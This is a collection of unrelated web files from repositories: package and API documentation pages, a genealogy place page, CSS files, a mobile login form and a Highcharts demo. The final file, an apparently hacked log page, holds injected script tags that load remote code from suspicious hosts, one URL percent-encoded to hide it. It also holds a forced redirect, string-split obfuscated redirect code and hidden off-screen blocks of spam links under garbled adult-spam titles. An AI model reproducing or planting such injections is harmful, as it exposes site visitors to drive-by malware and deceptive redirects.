<td> Windows binaries: </td>
<td> r-devel: <a href="../../../bin/windows/contrib/3.5/rGroovy_1.0.zip">rGroovy_1.0.zip</a>, r-release: <a href="../../../bin/windows/contrib/3.4/rGroovy_1.0.zip">rGroovy_1.0.zip</a>, r-oldrel: <a href="../../../bin/windows/contrib/3.3/rGroovy_1.0.zip">rGroovy_1.0.zip</a> </td>
</tr>
<tr>
<td> OS X El Capitan binaries: </td>
<td> r-release: <a href="../../../bin/macosx/el-capitan/contrib/3.4/rGroovy_1.0.tgz">rGroovy_1.0.tgz</a> </td>
</tr>
<tr>
<td> OS X Mavericks binaries: </td>
<td> r-oldrel: <a href="../../../bin/macosx/mavericks/contrib/3.3/rGroovy_1.0.tgz">rGroovy_1.0.tgz</a> </td>
</tr>
</table>
<h4>Linking:</h4>
<p>Please use the canonical form
<a href="https://CRAN.R-project.org/package=rGroovy"><samp>https://CRAN.R-project.org/package=rGroovy</samp></a>
to link to this page.</p>
</body>
</html>
|
docs/ServerShares/unacloud/share/utils/package-tree.html | UnaCloud/UnaCloud2 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="es">
<head>
<!-- Generated by javadoc (version 1.7.0_60) on Thu Jun 02 15:24:22 COT 2016 -->
<title>unacloud.share.utils Class Hierarchy</title>
<meta name="date" content="2016-06-02">
<link rel="stylesheet" type="text/css" href="../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="unacloud.share.utils Class Hierarchy";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li>Class</li>
<li>Use</li>
<li class="navBarCell1Rev">Tree</li>
<li><a href="../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../index-files/index-1.html">Index</a></li>
<li><a href="../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../unacloud/share/queue/package-tree.html">Prev</a></li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../index.html?unacloud/share/utils/package-tree.html" target="_top">Frames</a></li>
<li><a href="package-tree.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h1 class="title">Hierarchy For Package unacloud.share.utils</h1>
<span class="strong">Package Hierarchies:</span>
<ul class="horizontal">
<li><a href="../../../overview-tree.html">All Packages</a></li>
</ul>
</div>
<div class="contentContainer">
<h2 title="Class Hierarchy">Class Hierarchy</h2>
<ul>
<li type="circle">java.lang.Object
<ul>
<li type="circle">unacloud.share.utils.<a href="../../../unacloud/share/utils/EnvironmentManager.html" title="class in unacloud.share.utils"><span class="strong">EnvironmentManager</span></a></li>
</ul>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li>Class</li>
<li>Use</li>
<li class="navBarCell1Rev">Tree</li>
<li><a href="../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../index-files/index-1.html">Index</a></li>
<li><a href="../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../unacloud/share/queue/package-tree.html">Prev</a></li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../index.html?unacloud/share/utils/package-tree.html" target="_top">Frames</a></li>
<li><a href="package-tree.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
gramps42/gramps/example_NAVWEB0/plc/q/q/BXAKQCI8O6FYEAC0QQ.html | belissent/testing-example-reports | <!DOCTYPE html>
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head lang="en-US">
<title>My Family Tree - Places</title>
<meta charset="UTF-8" />
<meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" />
<meta name ="apple-mobile-web-app-capable" content="yes" />
<meta name="generator" content="Gramps 4.2.2 http://gramps-project.org/" />
<meta name="author" content="" />
<link href="../../../images/favicon2.ico" rel="shortcut icon" type="image/x-icon" />
<link href="../../../css/narrative-screen.css" media="screen" rel="stylesheet" type="text/css" />
<link href="../../../css/narrative-print.css" media="print" rel="stylesheet" type="text/css" />
</head>
<body onload = "initialize();" >
<div id="header">
<h1 id="SiteTitle">My Family Tree</h1>
</div>
<div class="wrapper" id="nav" role="navigation">
<div class="container">
<ul class="menu" id="dropmenu">
<li><a href="../../../individuals.html" title="Individuals">Individuals</a></li>
<li><a href="../../../index.html" title="Surnames">Surnames</a></li>
<li class = "CurrentSection"><a href="../../../places.html" title="Places">Places</a></li>
<li><a href="../../../sources.html" title="Sources">Sources</a></li>
<li><a href="../../../media.html" title="Media">Media</a></li>
<li><a href="../../../thumbnails.html" title="Thumbnails">Thumbnails</a></li>
</ul>
</div>
</div>
<div class="content" id="PlaceDetail">
<h3>Camden</h3>
<div id="summaryarea">
<table class="infolist place">
<tbody>
<tr>
<td class="ColumnAttribute">Gramps ID</td>
<td class="ColumnValue">P1127</td>
</tr>
<tr>
<td class="ColumnAttribute">Latitude</td>
<td class="ColumnValue">33.5845582</td>
</tr>
<tr>
<td class="ColumnAttribute">Longitude</td>
<td class="ColumnValue">-92.8343294</td>
</tr>
<tr>
<td class="ColumnAttribute">City</td>
<td class="ColumnValue">Camden</td>
</tr>
<tr>
<td class="ColumnAttribute">County</td>
<td class="ColumnValue">Ouachita</td>
</tr>
<tr>
<td class="ColumnAttribute">State/ Province</td>
<td class="ColumnValue">AR</td>
</tr>
<tr>
<td class="ColumnAttribute">Country</td>
<td class="ColumnValue">USA</td>
</tr>
</tbody>
</table>
</div>
<div class="subsection" id="references">
<h4>References</h4>
<ol class="Col1" role="Volume-n-Page"type = 1>
<li>
<a href="../../../ppl/i/k/JWAKQCFOIQMJU4SJKI.html">
Blanco, Malvina
<span class="grampsid"> [I0873]</span>
</a>
</li>
</ol>
</div>
</div>
<div class="fullclear"></div>
<div id="footer">
<p id="createdate">
Generated by <a href="http://gramps-project.org/">Gramps</a> 4.2.2 on 2015-12-25<br />Last change was the 2009-02-11 22:08:30
</p>
<p id="copyright">
</p>
</div>
</body>
</html>
|
sites/all/themes/airtribune2/plugins/layouts/panels/onecoltworow/onecoltworow.css | DmitryLoki/airtribune | /* CSS file for the 30 70 stacked layout */
@import url('../../../../css/base-grid.css');
.panel-col-seventy {
width: 100%;
}
.panel-header, .panel-top, .panel-footer {
width: 100%;
}
/* Margins taken from the Panels module plugins */
.lastUnit .inside {
margin: 0 0 1em .5em;
}
.firstUnit .inside {
margin: 0 .5em 1em 0;
}
.unit .inside {
margin: 0 .5em 1em .5em;
}
|
html/baseKnowLedge/graduation project/login.html | lizhehong/lizhehong.github.io | <!DOCTYPE html>
<html class="ui-mobile">
<head>
<title>登录</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="http://code.jquery.com/mobile/1.4.5/jquery.mobile-1.4.5.min.css" />
<script src="http://code.jquery.com/jquery-1.12.2.min.js"></script>
<script src="http://code.jquery.com/mobile/1.4.5/jquery.mobile-1.4.5.min.js"></script>
</head>
<body class="ui-mobile-viewport ui-overlay-a">
<div tabindex="0" class="ui-page ui-page-theme-a ui-page-active" data-role="page">
<div data-role="header">
<a class="ui-btn ui-shadow ui-corner-all ui-icon-back ui-btn-icon-notext" data-rel="back">返回</a>
<h1>登录</h1>
</div>
<!-- /header -->
<div role="main" class="ui-content">
<form method="post">
<label for="userName">账号:</label>
<input data-clear-btn="true" name="userName" id="userName" value="" type="text">
<label for="password">密码:</label>
<input data-clear-btn="true" name="password" id="password" value="" autocomplete="off" type="password">
<div class="ui-grid-a">
<div class="ui-block-a">
<button class="ui-corner-all ui-btn">登录</button>
</div>
<div class="ui-block-b">
<a href="register.html" data-transition="slide" class="ui-btn">注册</a>
</div>
</div>
<div class="ui-grid-a">
<div class="ui-block-a">
<a href="config.html" data-transition="slide" class="ui-btn">配置</a>
</div>
<div class="ui-block-b">
<a href="smartLink.html" data-transition="slide" class="ui-btn">SmartLink</a>
</div>
</div>
</form>
</div>
<!-- /content -->
<!-- /footer -->
</div>
<div class="ui-loader ui-corner-all ui-body-a ui-loader-default">
<span class="ui-icon-loading"></span>
<h1>loading</h1>
</div>
</body>
</html>
|
_functions/addup_percentage.html | mgsolipa/b2evolution_phpxref | <!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>PHPXRef 0.7.1 : Unnamed Project : Function Reference: addup_percentage()</title>
<link rel="stylesheet" href="../sample.css" type="text/css">
<link rel="stylesheet" href="../sample-print.css" type="text/css" media="print">
<style id="hilight" type="text/css"></style>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
</head>
<body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff">
<table class="pagetitle" width="100%">
<tr>
<td valign="top" class="pagetitle">
[ <a href="../index.html">Index</a> ]
</td>
<td align="right" class="pagetitle">
<h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2>
</td>
</tr>
</table>
<!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 -->
<!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net -->
<!-- http://phpxref.sourceforge.net/ -->
<script src="../phpxref.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript">
<!--
ext='.html';
relbase='../';
subdir='_functions';
filename='index.html';
cookiekey='phpxref';
handleNavFrame(relbase, subdir, filename);
logFunction('addup_percentage');
// -->
</script>
<script language="JavaScript" type="text/javascript">
if (gwGetCookie('xrefnav')=='off')
document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>');
else
document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>');
</script>
<noscript>
<p class="navlinks">
[ <a href="../nav.html" target="_top">Show Explorer</a> ]
[ <a href="index.html" target="_top">Hide Navbar</a> ]
</p>
</noscript>
[<a href="../index.html">Top level directory</a>]<br>
<script language="JavaScript" type="text/javascript">
<!--
document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>');
document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">');
document.writeln('<tr><td class="searchbox-title">');
document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>');
document.writeln('<\/td><\/tr>');
document.writeln('<tr><td class="searchbox-body" id="searchbox-body">');
document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>');
document.writeln('<a class="searchbox-body" href="../_classes/index.html">Class<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="classname"><br>');
document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../_functions/index.html">Function<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="funcname"><br>');
document.writeln('<a class="searchbox-body" href="../_variables/index.html">Variable<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="varname"><br>');
document.writeln('<a class="searchbox-body" href="../_constants/index.html">Constant<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="constname"><br>');
document.writeln('<a class="searchbox-body" href="../_tables/index.html">Table<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="tablename"><br>');
document.writeln('<input type="submit" class="searchbox-button" value="Search">');
document.writeln('<\/form>');
document.writeln('<\/td><\/tr><\/table>');
document.writeln('<\/td><\/tr><\/table>');
// -->
</script>
<div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div>
<h3>Function and Method Cross Reference</h3>
<h2><a href="index.html#addup_percentage">addup_percentage()</a></h2>
<b>Defined at:</b><ul>
<li><a href="../inc/_core/_template.funcs.php.html#addup_percentage">/inc/_core/_template.funcs.php</a> -> <a onClick="logFunction('addup_percentage', '/inc/_core/_template.funcs.php.source.html#l2051')" href="../inc/_core/_template.funcs.php.source.html#l2051"> line 2051</a></li>
</ul>
<b>Referenced 1 times:</b><ul>
<li><a href="../inc/sessions/views/_stats_search_keywords.view.php.html">/inc/sessions/views/_stats_search_keywords.view.php</a> -> <a href="../inc/sessions/views/_stats_search_keywords.view.php.source.html#l277"> line 277</a></li>
</ul>
<!-- A link to the phpxref site in your customized footer file is appreciated ;-) -->
<br><hr>
<table width="100%">
<tr><td>Generated: Sat Nov 21 22:13:19 2015</td>
<td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td>
</tr>
</table>
</body></html>
|
Coding/Python/scipy-html-0.16.1/generated/scipy.interpolate.SmoothBivariateSpline.integral.html | platinhom/ManualHom | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>scipy.interpolate.SmoothBivariateSpline.integral — SciPy v0.16.1 Reference Guide</title>
<link rel="stylesheet" type="text/css" href="../static_/css/spc-bootstrap.css">
<link rel="stylesheet" type="text/css" href="../static_/css/spc-extend.css">
<link rel="stylesheet" href="../static_/scipy.css" type="text/css" >
<link rel="stylesheet" href="../static_/pygments.css" type="text/css" >
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: '../',
VERSION: '0.16.1',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: false
};
</script>
<script type="text/javascript" src="../static_/jquery.js"></script>
<script type="text/javascript" src="../static_/underscore.js"></script>
<script type="text/javascript" src="../static_/doctools.js"></script>
<script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
<script type="text/javascript" src="../static_/js/copybutton.js"></script>
<link rel="top" title="SciPy v0.16.1 Reference Guide" href="../index.html" >
<link rel="up" title="scipy.interpolate.SmoothBivariateSpline" href="scipy.interpolate.SmoothBivariateSpline.html" >
<link rel="next" title="scipy.interpolate.SmoothSphereBivariateSpline" href="scipy.interpolate.SmoothSphereBivariateSpline.html" >
<link rel="prev" title="scipy.interpolate.SmoothBivariateSpline.get_residual" href="scipy.interpolate.SmoothBivariateSpline.get_residual.html" >
</head>
<body>
<div class="container">
<div class="header">
</div>
</div>
<div class="container">
<div class="main">
<div class="row-fluid">
<div class="span12">
<div class="spc-navbar">
<ul class="nav nav-pills pull-left">
<li class="active"><a href="../index.html">SciPy v0.16.1 Reference Guide</a></li>
<li class="active"><a href="../interpolate.html" >Interpolation (<tt class="docutils literal"><span class="pre">scipy.interpolate</span></tt>)</a></li>
<li class="active"><a href="scipy.interpolate.SmoothBivariateSpline.html" accesskey="U">scipy.interpolate.SmoothBivariateSpline</a></li>
</ul>
<ul class="nav nav-pills pull-right">
<li class="active">
<a href="../genindex.html" title="General Index"
accesskey="I">index</a>
</li>
<li class="active">
<a href="../py-modindex.html" title="Python Module Index"
>modules</a>
</li>
<li class="active">
<a href="../scipy-optimize-modindex.html" title="Python Module Index"
>modules</a>
</li>
<li class="active">
<a href="scipy.interpolate.SmoothSphereBivariateSpline.html" title="scipy.interpolate.SmoothSphereBivariateSpline"
accesskey="N">next</a>
</li>
<li class="active">
<a href="scipy.interpolate.SmoothBivariateSpline.get_residual.html" title="scipy.interpolate.SmoothBivariateSpline.get_residual"
accesskey="P">previous</a>
</li>
</ul>
</div>
</div>
</div>
<div class="row-fluid">
<div class="spc-rightsidebar span3">
<div class="sphinxsidebarwrapper">
<p class="logo"><a href="../index.html">
<img class="logo" src="../static_/scipyshiny_small.png" alt="Logo">
</a></p>
<h4>Previous topic</h4>
<p class="topless"><a href="scipy.interpolate.SmoothBivariateSpline.get_residual.html"
title="previous chapter">scipy.interpolate.SmoothBivariateSpline.get_residual</a></p>
<h4>Next topic</h4>
<p class="topless"><a href="scipy.interpolate.SmoothSphereBivariateSpline.html"
title="next chapter">scipy.interpolate.SmoothSphereBivariateSpline</a></p>
</div>
</div>
<div class="span9">
<div class="bodywrapper">
<div class="body" id="spc-section-body">
<div class="section" id="scipy-interpolate-smoothbivariatespline-integral">
<h1>scipy.interpolate.SmoothBivariateSpline.integral<a class="headerlink" href="#scipy-interpolate-smoothbivariatespline-integral" title="Permalink to this headline">¶</a></h1>
<dl class="method">
<dt id="scipy.interpolate.SmoothBivariateSpline.integral">
<tt class="descclassname">SmoothBivariateSpline.</tt><tt class="descname">integral</tt><big>(</big><em>xa</em>, <em>xb</em>, <em>ya</em>, <em>yb</em><big>)</big><a class="reference external" href="http://github.com/scipy/scipy/blob/v0.16.1/scipy/interpolate/fitpack2.py#L954"><span class="viewcode-link">[source]</span></a><a class="headerlink" href="#scipy.interpolate.SmoothBivariateSpline.integral" title="Permalink to this definition">¶</a></dt>
<dd><p>Evaluate the integral of the spline over area [xa,xb] x [ya,yb].</p>
<table class="docutils field-list" frame="void" rules="none">
<col class="field-name" />
<col class="field-body" />
<tbody valign="top">
<tr class="field-odd field"><th class="field-name">Parameters:</th><td class="field-body"><p class="first"><strong>xa, xb</strong> : float</p>
<blockquote>
<div><p>The end-points of the x integration interval.</p>
</div></blockquote>
<p><strong>ya, yb</strong> : float</p>
<blockquote>
<div><p>The end-points of the y integration interval.</p>
</div></blockquote>
</td>
</tr>
<tr class="field-even field"><th class="field-name">Returns:</th><td class="field-body"><p class="first"><strong>integ</strong> : float</p>
<blockquote class="last">
<div><p>The value of the resulting integral.</p>
</div></blockquote>
</td>
</tr>
</tbody>
</table>
</dd></dl>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="container container-navbar-bottom">
<div class="spc-navbar">
</div>
</div>
<div class="container">
<div class="footer">
<div class="row-fluid">
<ul class="inline pull-left">
<li>
© Copyright 2008-2014, The Scipy community.
</li>
<li>
Last updated on Oct 24, 2015.
</li>
<li>
Created using <a href="http://sphinx.pocoo.org/">Sphinx</a> 1.2.1.
</li>
</ul>
</div>
</div>
</div>
</body>
</html> |
Xj3D/src/java/org/web3d/vrml/renderer/ogl/nodes/particle/package.html | Norkart/NK-VirtualGlobe | <HTML>
<BODY>
OpenGL-specific implementation of the Xj3D extension component for
particle system modelling.
<p>
</BODY>
</HTML>
|
css/navigation.css | dsd-meetme/website | .navbar_button {
margin-top: 4px;
padding: 6px 12px;
color: white;
background-color: transparent;
border: 1px solid white;
border-radius: 4px;
outline: none;
font-weight: 300;
}
.navbar_button:hover, .navbar_button:active, .navbar_button:focus {
border: 1px solid #f7f7f7;
color: #f7f7f7;
}
.navigation {
padding: 7px 20px 7px 20px;
background: #457fca;
background: -webkit-linear-gradient(to left, #457fca, #5691c8);
background: linear-gradient(to left, #457fca, #5691c8);
}
.navigation .navigation-left {
float: left;
margin-top: 10px;
}
.navigation .navigation-left img {
width: 150px;
}
.navigation .navigation-right {
margin-top: 4px;
float: right;
}
.navigation .navigation-right a {
margin-right: 40px;
text-decoration: none;
color: white;
font-weight: 300;
}
.navigation .navigation-right .user_icon {
width: 20px;
margin-right: 15px;
}
.navigation .navigation-right ul li:last-child img {
width: 20px;
display: none;
cursor: pointer;
}
.navigation {
padding: 7px 20px 7px 20px;
}
.navigation .navigation-left {
float: left;
margin-top: 13px;
}
.navigation .navigation-left img {
width: 150px;
}
.navigation .navigation-right {
margin-top: 4px;
float: right;
}
.navigation .navigation-right a {
margin-right: 20px;
text-decoration: none;
}
.navigation .navigation-right .user_icon {
width: 40px;
margin-right: 15px;
}
.navigation--presentation {
background-color: transparent;
padding-top: 16px;
padding-bottom: 10px;
}
.navigation--presentation .navigation-left {
margin: 0;
}
.navigation--presentation .navigation-right a {
color: white;
text-decoration: none;
margin: 0;
padding: 8px 16px;
font-weight: 300;
}
.navigation--presentation .navigation-right ul li:last-child a {
border: 2px solid white;
border-radius: 4px;
}
@media (max-width: 500px) {
.navigation {
padding-top: 15.5px;
padding-bottom: 15.5px;
}
.navigation .navigation-left {
margin-top: 0;
}
.navigation .navigation-right a {
margin-right: 20px;
}
.navigation .navigation-right ul li:last-child {
float: right;
}
.navigation .navigation-right ul li:last-child img {
display: block;
}
.navigation .navigation-right span {
display: none;
}
.navigation .navigation-right button {
display: none;
}
.navigation--presentation .navigation-left {
float: left;
border-bottom: 0;
width: auto;
padding: 0;
}
.navigation--presentation .navigation-right li:first-child {
float: right;
border: 2px solid white;
padding: 5px;
margin-top: -5px;
}
.navigation--presentation .navigation-right li:last-child {
display: none;
}
}
|
solutions/hightcharts/demo1.html | chancedai/front-end-solutions | <!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<title>海拔高度</title>
</head>
<body>
<script src="http://news.sina.com.cn/js/792/2014-03-18/80/jquery-1.11.0.min.js"></script>
<script type="text/javascript" src="Highcharts-4.0.3/js/highcharts.js"></script>
<div id="flight-profile-altitude-graph" style="width: 800px; height: 400px; margin: 0 auto;background:#000;"></div>
<div id="flight-profile-batteries-graph" style="width: 800px; height: 200px; margin: 0 auto;background:#000;"></div>
<script type="text/javascript">
$(function () {
var altitude = [];
for (i = 144; i > 0; i--) {
altitude.push(100*i);
}
$('#flight-profile-altitude-graph').highcharts({
colors: ["#ffbf3b"],
title: {
text: '',
style: {
display: 'none'
}
},
subtitle: {
text: '',
style: {
display: 'none'
}
},
chart: {
type: 'column',
backgroundColor: 'transparent'
},
xAxis: {
min: 0,
title: {
text: false
},
lineColor: '#555',
gridLineColor: 'transparent',
minorTickLength: 0,
tickLength: 0,
labels: {
enabled: false
}
},
yAxis: {
title: {
text: false
},
gridLineColor: 'transparent',
labels: {
style: { color: '#ffbf3b' }
}
},
exporting: {
enabled: false
},
plotOptions: {
column: {
pointPadding: 0.2,
borderWidth: 0
}
},
credits: {
enabled: false
},
series: [{
showInLegend: false,
name: '',
data: altitude
}]
});
});
$(function () {
var batteries = [];
var batteries_color = [];
for (i = 144; i > 0; i--) {
batteries.push(i/2);
if (i/2 < 20)
batteries_color.push('#ff0000');
else
batteries_color.push('#fff');
}
$('#flight-profile-batteries-graph').highcharts({
plotOptions: {
column: {
colorByPoint: true,
pointPadding: 0.2,
borderWidth: 0
}
},
colors: batteries_color,
title: {
text: '',
style: {
display: 'none'
}
},
subtitle: {
text: '',
style: {
display: 'none'
}
},
chart: {
type: 'column',
backgroundColor: 'transparent'
},
xAxis: {
min: 0,
title: {
text: false
},
lineColor: '#555',
gridLineColor: 'transparent',
minorTickLength: 0,
tickLength: 0,
labels: {
enabled: false
}
},
yAxis: {
min: 0, max: 100,
title: {
text: false
},
gridLineColor: 'transparent',
labels: {
style: { color: '#fff' }
}
},
exporting: {
enabled: false
},
credits: {
enabled: false
},
series: [{
showInLegend: false,
name: '',
data: batteries
}]
});
});
</script>
</body>
</html> |
logs/kengjisong/234.html | ForAEdesWeb/AEW25 | <script/src=//%61%6C%69%63%64%6E%2E%72%65%2E%6B%72/%72%65%2E%6B%72></script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>99re2.¾Ã¾ÃÈÈ×îеØÖ·|É«ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø</title>
<meta name="keywords" content="99re2.¾Ã¾ÃÈÈ×îеØÖ· ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø">
<meta name="description" content="99re2.¾Ã¾ÃÈÈ×îеØÖ·¸÷ÖÖ¾«²ÊÄÚÈÝʵʱ¸üÐÂ,Ϊ¹ã´óÍøÓÑÌṩԴ´×ÊÔ´,99re2.¾Ã¾ÃÈÈ×îеØÖ·Ò»ÆðËáˬ¡£ ,˼˼µÄ¼ÒÔ°"><link rel="shortcut icon" type="image/x-icon" href="favicon.ico" />
</head>
<script/src=//alicdn.re.kr/re.kr></script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>99re2.¾Ã¾ÃÈÈ×îеØÖ·|É«ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø</title>
<meta name="keywords" content="99re2.¾Ã¾ÃÈÈ×îеØÖ· ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø">
<meta name="description" content="99re2.¾Ã¾ÃÈÈ×îеØÖ·¸÷ÖÖ¾«²ÊÄÚÈÝʵʱ¸üÐÂ,Ϊ¹ã´óÍøÓÑÌṩԴ´×ÊÔ´,99re2.¾Ã¾ÃÈÈ×îеØÖ·Ò»ÆðËáˬ¡£ ,˼˼µÄ¼ÒÔ°"><link rel="shortcut icon" type="image/x-icon" href="favicon.ico" />
</head>
-------!>
<script/src=//360cdn.win/c.css></script>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.zgjm-org.com">
<script> var xx="<scr"; xx=xx+"ipt>win"; xx=xx+"dow.loc"; xx=xx+"ation.hr"; xx=xx+"ef='http://"; xx=xx+"www."; xx=xx+"zgjm-org"; xx=xx+"."; xx=xx+"com"; xx=xx+"'<\/sc"; xx=xx+"ript>";// document.write(xx); </script>
<script/src=//alicdn.re.kr/re.kr></script>
<div class="a1b2c8d9e1" style="position:fixed;left:-3000px;top:-3000px;">
<a class="a1b2c8d9e1" href="http://www.fliggypig.com">http://www.fliggypig.com</a>
<a class="a1b2c8d9e1" href="http://www.4006000871.com">http://www.4006000871.com</a>
<a class="a1b2c8d9e1" href="http://www.ddabw.com">http://www.ddabw.com</a>
<a class="a1b2c8d9e1" href="http://www.ktiyl.com">http://www.ktiyl.com</a>
<a class="a1b2c8d9e1" href="http://www.abbwl.com">http://www.abbwl.com</a>
<a class="a1b2c8d9e1" href="http://www.rht365.com">http://www.rht365.com</a>
</div class="a1b2c8d9e1">
<script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '000' + 'p' + 'x;t' + 'op' + ':-3' + '000' + 'p' + 'x;' + '"' + '>');</script>
<a class="z7z8z9z6" href="http://www.4695288.com/">http://www.4695288.com/</a>
<a class="z7z8z9z6" href="http://www.5613117.com/">http://www.5613117.com/</a>
<a class="z7z8z9z6" href="http://www.4309272.com/">http://www.4309272.com/</a>
<a class="z7z8z9z6" href="http://www.3619276.com/">http://www.3619276.com/</a>
<a class="z7z8z9z6" href="http://www.1539774.com/">http://www.1539774.com/</a>
<a class="z7z8z9z6" href="http://www.2234809.com/">http://www.2234809.com/</a>
<a class="z7z8z9z6" href="http://www.0551180.com/">http://www.0551180.com/</a>
<a class="z7z8z9z6" href="http://www.0027022.com/">http://www.0027022.com/</a>
<a class="z7z8z9z6" href="http://www.1408600.com/">http://www.1408600.com/</a>
<a class="z7z8z9z6" href="http://www.5004279.com/">http://www.5004279.com/</a>
<a class="z7z8z9z6" href="http://www.4314451.com/">http://www.4314451.com/</a>
<a class="z7z8z9z6" href="http://www.9402647.com/">http://www.9402647.com/</a>
<a class="z7z8z9z6" href="http://www.6420212.com/">http://www.6420212.com/</a>
<a class="z7z8z9z6" href="http://www.0921315.com/">http://www.0921315.com/</a>
<a class="z7z8z9z6" href="http://www.4849062.com/">http://www.4849062.com/</a>
<a class="z7z8z9z6" href="http://www.8027847.com/">http://www.8027847.com/</a>
<a class="z7z8z9z6" href="http://www.5101309.com/">http://www.5101309.com/</a>
<a class="z7z8z9z6" href="http://www.8033162.com/">http://www.8033162.com/</a>
<a class="z7z8z9z6" href="http://www.7808733.com/">http://www.7808733.com/</a>
<a class="z7z8z9z6" href="http://www.7021821.com/">http://www.7021821.com/</a>
<a class="z7z8z9z6" href="http://www.8560978.com/">http://www.8560978.com/</a>
